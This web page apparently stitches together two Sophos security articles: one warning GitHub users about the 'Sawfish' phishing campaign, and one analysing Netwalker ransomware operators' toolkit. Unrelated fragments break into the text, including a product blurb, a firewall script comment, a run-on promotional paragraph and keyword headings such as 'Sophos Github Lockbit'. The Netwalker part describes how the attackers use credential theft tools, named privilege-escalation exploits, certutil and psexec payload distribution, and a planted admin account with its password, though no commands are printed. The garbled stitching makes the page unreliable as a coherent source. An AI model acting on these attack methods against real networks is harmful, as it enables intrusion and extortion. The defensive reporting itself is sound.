GitHub users beware: online criminals have launched a phishing campaign to try and gain access to your accounts.
The Microsoft-owned source code collaboration and version control service reported the campaign, which it calls Sawfish, on Tuesday 14 April. Users were reporting emails that tried to lure them into entering their GitHub credentials on fake sites for a week before, it said.
The phishing campaign lures victims to domains that look similar to GitHub’s at first glance but which the company doesn’t own, such as git-hub.co, sso-github.com, and corp-github.com, the company said. Other domains misspell the ‘i’ in GitHub with an ‘l’, like glthub.info. The attacker also tried domains that look like those owned by other tech companies, such as aws-update.net and slack-app.net. Most of these domains are already down and the phisher has been swapping them out quickly, GitHub warned.
- Sophos Cloud Optix is an AI-powered security and compliance platform for public cloud environments. Getting started. You need a subscription or free trial account to use Sophos Cloud Optix. Add your AWS environment. GitHub and Bitbucket accounts (IaC).
- # Sophos XG Let's Encrypt certificate update script # It uses huge workaround due to Sophos XG limitations: # - can't update a certificate when it's used by WAF # - can't update FirewallRule trough API to use another certificate # - can't SCP a file trough SSH # So ok it's ugly, but it's not the only one. SOPHOSIP= ' 192.168.0.254 '.
The phishing emails – which aren’t always well-written – try to raise the recipient’s alarm by suggesting that there’s something fishy going on with their account. One example, received on 4 April, asked a user to review their account activity:
GitHub users beware. Get 24/7 managed threat hunting, detection, and response delivered by Sophos experts Learn more. Once the attacker gains access, they can download the contents of private. Follow their code on GitHub. SophosLabs has 15 repositories available. Follow their code on GitHub. Repository for files shared by Sophos Managed Threat Response. Ransomware’s behavior is its Achilles' heel, which is why Sophos spends so much time studying it. In this report, we've assembled some of the behavioral patterns of the ten most common, damaging, and persistent ransomware families. Our goal is to give security operators a guideline to understand the core behaviors that underlie.
It then took the user to this fake site, with a domain that GitHub says is associated with the Sawfish campaign:
The phishers appear to be targeting people based on the addresses used for public Git commits. These are updates to source code that are publicly viewable. That could explain one Redditor’s report of a phishing email sent to an address used exclusively for GitHub.
Attackers use several techniques to hide the real link destination, including URL shorteners, sometimes strung together to make it even more difficult to see the ultimate destination. They also use redirectors on compromised sites that have a legitimate-looking URL but which then send the victim to another malicious site.
Once the attacker gains access, they can download the contents of private repositories, which may be owned by the organizations they work for. They can also use GitHub OAuth tokens which authorize them to access the site for a predefined period even if the user changes their password. Alternatively, they could create a GitHub personal access token, which allows the user to access their GitHub account using the Security Assertion Markup Language (SAML). This is an open authentication standard often used for single sign-on (SSO) access. Setting up an SSH certificate to access a logged-in account is also trivial. If the victim of a phishing attack didn’t review their SSH certs, the attacker could continue accessing the account covertly for a long time.
The phishing attack even works against some kinds of two-factor authentication (2FA) attack. One 2FA option that GitHub offers is a time-based one-time password (TOTP). This is a step up from SMS-based authentication which attackers have subverted with SIM-jacking attacks. TOTP applications generate an authentication code that is valid for a certain time period, but the user still has to enter those codes into the authenticating website. The phishing site relays the TOTP code to the attacker, who then performs a man-in-the-middle attack and enters the TOTP code into GitHub.
The attack doesn’t work against hardware-based authentication systems based on WebAuthn, which GitHub began using in August 2019 as a second layer of authentication to complement TOTP codes. This includes a physical token that the attacker won’t have.
Why is this phishing campaign so important? Any phishing attack is a problem, but getting access to a GitHub user’s private repository could yield not only source code but keys to access online applications and SSH keys, along with login credentials for other online services. That’s bad enough for a private personal project, but could be devastating if the victim happens to have access to sensitive assets connected with a popular online app. That’s how hacker Kyle Milliken pwned Disqus.
What to do
Protect yourself by double-checking the destination site you end up at when following any emails, warned GitHub.
Use a password manager that will only enter your credentials into a domain that it recognizes, and get yourself a hardware security key that supports WebAuthn to access the site, it adds (which automatically means enabling 2FA).
Review the SSH keys used to access your GitHub account, verify your email addresses, and review your account’s security log to check for any phishy behaviour.
Latest Naked Security podcast
LISTEN NOW
Click-and-drag on the soundwaves below to skip to any point in the podcast. You can also listen directly on Soundcloud.
While investigating a malware campaign involving Netwalker ransomware, SophosLabs stumbled upon a set of files used by the criminals involved in the attacks. The trove of malware and related files reveals details about methods the attackers employed to compromise networks, elevate their privileges, and distribute the malware to workstations in very recent attacks.
In this blog, we’ll survey the collection and the insight it provides into this threat actor’s typical behavior. The tools included legitimate, publicly-available software (like TeamViewer), files cribbed from public code repositories (such as Github), and scripts (PowerShell) that appeared to have been created by the attackers themselves.
The Netwalker threat actor has struck a diverse set of targets based in the US, Australia, and western Europe, and recent reports indicate the attackers have decided to concentrate their efforts targeting large organizations, rather than individuals. The tooling we uncovered supports this hypothesis, as it includes programs intended to capture Domain Administrator credentials from an enterprise network, combined with orchestration tools that employ software distribution served from a Domain Controller, common in enterprise networks but rare among home users.
And while the bulk of the payloads were Netwalker, we also found individual samples of the Zeppelin Windows ransomware and the Smaug Linux ransomware as well.
What’s in a criminal’s toolbox
The archive contained at least 12 archived copies of the ransomware deployment package used by the threat actors, but also included a bonanza: a comprehensive set of tools used to perform reconnaissance on targeted networks; privilege-elevation and other exploits against Windows computers; and utilities that can steal, sniff, or brute-force their way to valuable information (including Mimikatz, and variants called Mimidogz and Mimikittenz, designed around avoiding detection by endpoint security) from a machine or network.
Some of the scripts and exploit tools were copied directly from Github repositories. Several of the tools are freely-available Windows utilities, such as Amplia Security’s Windows Credential Editor.
We also found a nearly complete set of the Microsoft SysInternals PsTools package, a copy of NLBrute (which attempts to brute-force passwords), installers for the commercial TeamViewer and AnyDesk remote support tools, and a number of utilities created by endpoint security vendors that are designed to remove their (and other companies’) endpoint security and antivirus tools from a computer.
Dissecting the break-in
It isn’t entirely clear how the threat actors behind this campaign gain an initial foothold into the networks they target, though there are hints they take advantage of well-known, heavily publicized vulnerabilities in widely used, outdated server software (such as Tomcat or Weblogic) or weak RDP passwords.
We found a brute-force tool called NLBrute, with configuration files that tell us it had been set up to use an included set of username and passwords to try to break in to machines that have Remote Desktop enabled. NLBrute can be used in attacks targeting the perimeter, as well as a way to gain lateral access to other machines from a “foothold” in the network.
Once inside the network of their target, the attackers apparently use the SoftPerfect Network Scanner to identify and create target lists of computers with open SMB ports, and subsequently may have used Mimikatz, Mimidogz, or Mimikittenz to obtain credentials.
The files we recovered also revealed their preferred collection of exploits. Among them, we found variations on the EternalDarkness SMBv3 exploit (CVE-2020-0796), a CVE-2019-1458 local privilege exploit against Windows, the CVE-2017-0213 Windows COM privilege escalation exploit published on the Google Security Github account, and the CVE-2015-1701 “RussianDoll” privilege escalation exploit.
We also found the source code for the firefart variant of the pokemon exploit against the dirtycow vulnerability; that’s far too many ludicrous names for one Linux privilege escalation exploit. The attackers did not even bother modifying it from its default configured username value of firefart, either, but they may do that elsewhere.
In addition to exploits and hacking tools, the attackers have pulled together a ragtag collection of software designed to remove endpoint security and antivirus tools from Windows computers. Among the tools we found in their collection were AV Remover, published by ESET, and Trend Micro WorryFree Uninstall.
Ransomware delivery
The attackers typically distribute Netwalker ransomware with the use of a reflective PowerShell loader script that has been protected from casual analysis with several layers of obfuscation.
The script itself decodes and executes a large blob of base64-encoded text and converts it into a huge byte array. The script then decrypts that byte array (with a one-byte XOR algorithm) into a string, and then decodes another byte array out of this second array that normally (but not always) contains both a 32-bit and 64-bit version of the DLL, which it then loads into memory.
Here the array $dYtajKpwMqeYDr contains the 32-bit payload and $pLJPFgJtEVxJpXr the 64-bit payload. The starting MZ marker is replaced with 0xad 0xde in order to avoid suspicion (highlighted in green). It is not needed anyway, because the DLLs are not loaded by the operating system; the script implements all the necessary steps, without checking the MZ magic.
Finally the script deletes the shadow copies, in a preparation for the ransomware operations.
The attackers orchestrate attacks using batch or PowerShell scripts that are executed, with the help of domain controllers, on any machine the DC can reach. The scripts retrieve the attackers’ payloads using psexec or certutil.
They apparently create a Domain Admin account named SQLSVC and give it the password Br4pbr4p (which also happens to be the password salt preconfigured in the dirtycow exploit script) and then leverage that account to perform a series of commands.
Sophos Github Lockbit
certutil is a WIndows component that can download external content to the computer. In a typical attack, the criminals follow this paradigm:
The attackers sometimes issue this downloader command en masse to the targeted computers, which dutifully download the executable form of the Netwalker ransomware as a payload.
Alternatively, they distribute the ransomware executable within the targeted network themselves, in real time. The files we recovered indicate they do it by executing a script file, which uses the Sysinternals psexec tool to move laterally by trying to copy it to every machine they can reach:
The relevant psexec command line switches are:
So this method uses psexec itself to copy the payload over the network, overwrite earlier versions (if found), and run it without waiting for any response.
The attackers sometimes get a foothold within an organization, explore the network for a while, then distribute a PowerShell dropper for the ransomware.
They use batch files that leverage psexec, again, to push PowerShell loader scripts out to machines the network scanner finds on the internal network.
In both cases, the process ends with the Netwalker payload loaded and executed. The final malware is either a DLL or executable file.
The files on the target computer get encrypted and the user finds a ransom message like this one:
Sophos Github Extension
Each time they attacked a new victim organization, the attackers use a unique build of the Netwalker DLL. Oddly, many of the Netwalker DLLs have the same creation time in their PE header. In fact, the only difference between them is the encrypted blob store in resource number 1337 or 31337. It seems likely that, most of the time, they use the same DLL template and only change this encrypted blob.
Conclusion
Ransomware attack nowadays are not single-shot events like Wannacry was in 2017. The criminals have well-established procedures and toolsets they routinely use. The attacks are usually longer: attackers spend days (or even weeks) within the victim organizations, carefully mapping the internal network while gathering credentials and other useful information.
Our findings are a good example of the trend that we have observed all around the threat landscape. The criminals orchestrate well-designed manual attack, infiltrate and thoroughly recon the victim systems, disable protection before delivering the final attack.
The threat actors behind the Netwalker ransomware rely less on self-made tools than do other ransomware groups. The largest part of the toolset are tools collected from the public domain. The use of these so-called grey hat applications saves them development time at the cost of originality.
Views like this one, directly into the attacker’s tactics and tooling, offer a rare glimpse behind the curtain that dramatically helps defenders prepare their defense against the early stages of an attack, before attackers can deliver their ransomware payloads.
IOCs
SophosLabs has published a list of indicators of compromise for samples acquired for this analysis on its Github page.